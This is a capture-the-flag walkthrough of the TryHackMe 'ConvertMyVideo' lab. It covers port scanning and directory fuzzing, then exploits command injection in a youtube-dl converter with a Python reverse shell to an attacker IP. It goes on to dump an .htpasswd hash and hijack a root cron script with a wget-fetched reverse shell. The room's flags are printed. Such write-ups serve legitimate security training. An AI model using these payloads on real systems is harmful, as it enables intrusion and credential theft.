TryHackMe "ConvertMyVideo"
April 22nd, 2023

Introduction
ConvertMyVideo is a medium room released on May 2nd, 2020 by overjt.
User Own
What is the name of the secret folder?
Nmap scan:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-22 15:25 EDT
Nmap scan report for 10.10.xx.xx
Host is up (0.10s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 651bfc741039dfddd02df0531ceb6dec (RSA)
| 256 c42804a5c3b96a955a4d7a6e46e214db (ECDSA)
|_ 256 ba07bbcd424af293d105d0b34cb1d9b1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
3737/tcp filtered xpanel
5850/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.82 seconds
The system is running a website that converts YouTube videos to MP3 files. Running ffuf
on the website shows a subdirectory called admin
.
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.xx.xx/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 2563ms]
* FUZZ: .htpasswd
[Status: 401, Size: 460, Words: 42, Lines: 15, Duration: 163ms]
* FUZZ: admin
[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 236ms]
* FUZZ: .hta
[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 236ms]
* FUZZ: .htaccess
[Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 160ms]
* FUZZ: images
[Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 158ms]
* FUZZ: js
[Status: 200, Size: 747, Words: 154, Lines: 20, Duration: 5429ms]
* FUZZ: index.php
[Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 160ms]
* FUZZ: server-status
[Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 160ms]
* FUZZ: tmp
:: Progress: [4713/4713] :: Job [1/1] :: 178 req/sec :: Duration: [0:00:32] :: Errors: 0 ::
What is the user to access the secret folder?
The website takes an input for a YouTube ID. Supplying nothing shows the website is using youtube-dl. Checking the JavaScript for the website in main.js
shows that the input is being concatenated to the base YouTube URL.
$(function () {
$("#convert").click(function () {
$("#message").html("Converting...");
$.post("/", { yt_url: "https://www.youtube.com/watch?v=" + $("#ytid").val() }, function (data) {
try {
data = JSON.parse(data);
if(data.status == "0"){
$("#message").html("<a href='" + data.result_url + "'>Download MP3</a>");
}
else{
console.log(data);
$("#message").html("Oops! something went wrong");
}
} catch (error) {
console.log(data);
$("#message").html("Oops! something went wrong");
}
});
});
});
Using the input --;id;
shows that the website is vulnerable to command injection.
{
"status": 127,
"errors": "WARNING: Assuming --restrict-filenames since file system encoding cannot encode all characters. Set the LC_ALL environment variable to fix this.\nUsage: youtube-dl [OPTIONS] URL [URL...]\n\nyoutube-dl: error: You must provide at least one URL.\nType youtube-dl --help to see a list of all options.\nsh: 1: -f: not found\n",
"url_orginal": "--;id;",
"output": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n",
"result_url": "/tmp/downloads/6444366a5e64a.mp3"
}
A Python reverse shell can be used to get in as www-data
.
--;python${IFS}-c${IFS}'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.xx.xx",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")';
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.6.xx.xx] from (UNKNOWN) [10.10.xx.xx] 43554
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls
ls
admin images index.php js style.css tmp
Checking the admin
directory:
ls admin -a
. .. .htaccess .htpasswd flag.txt index.php
The contents of .htpasswd
are:
$ cat admin/.htpasswd
cat admin/.htpasswd
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/
The login credentials for the admin
page are the username itsmeadmin
and a hashed password.
What is the user flag?
The user flag is inside the admin
directory.
$ cat admin/flag.txt
cat admin/flag.txt
flag{0d8486a0c0c42503bb60ac77f4046ed7}
The flag is flag{0d8486a0c0c42503bb60ac77f4046ed7}
.
System Own
What is the root flag?
Inside tmp
is a file called clean.sh
. Replacing the contents of clean.sh
with a reverse shell will eventually get you in as root
, as root
runs this file periodically to remove all download files.
python3 -m http.server 80
wget http://10.6.xx.xx/clean.sh -O clean.sh
--2023-04-22 20:00:08-- http://10.6.xx.xx/clean.sh
Connecting to 10.6.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 49 [text/x-sh]
Saving to: 'clean.sh'
clean.sh 100%[===================>] 49 --.-KB/s in 0s
2023-04-22 20:00:09 (8.09 MB/s) - 'clean.sh' saved [49/49]
nc -nvlp 1235
listening on [any] 1235 ...
connect to [10.6.xx.xx] from (UNKNOWN) [10.10.xx.xx] 54788
mesg: ttyname failed: Inappropriate ioctl for device
cat /root/root.txt
flag{d9b368018e912b541a4eb68399c5e94a}
The root flag inside /root/root.txt
is flag{d9b368018e912b541a4eb68399c5e94a}
.
And that's the room!
Last updated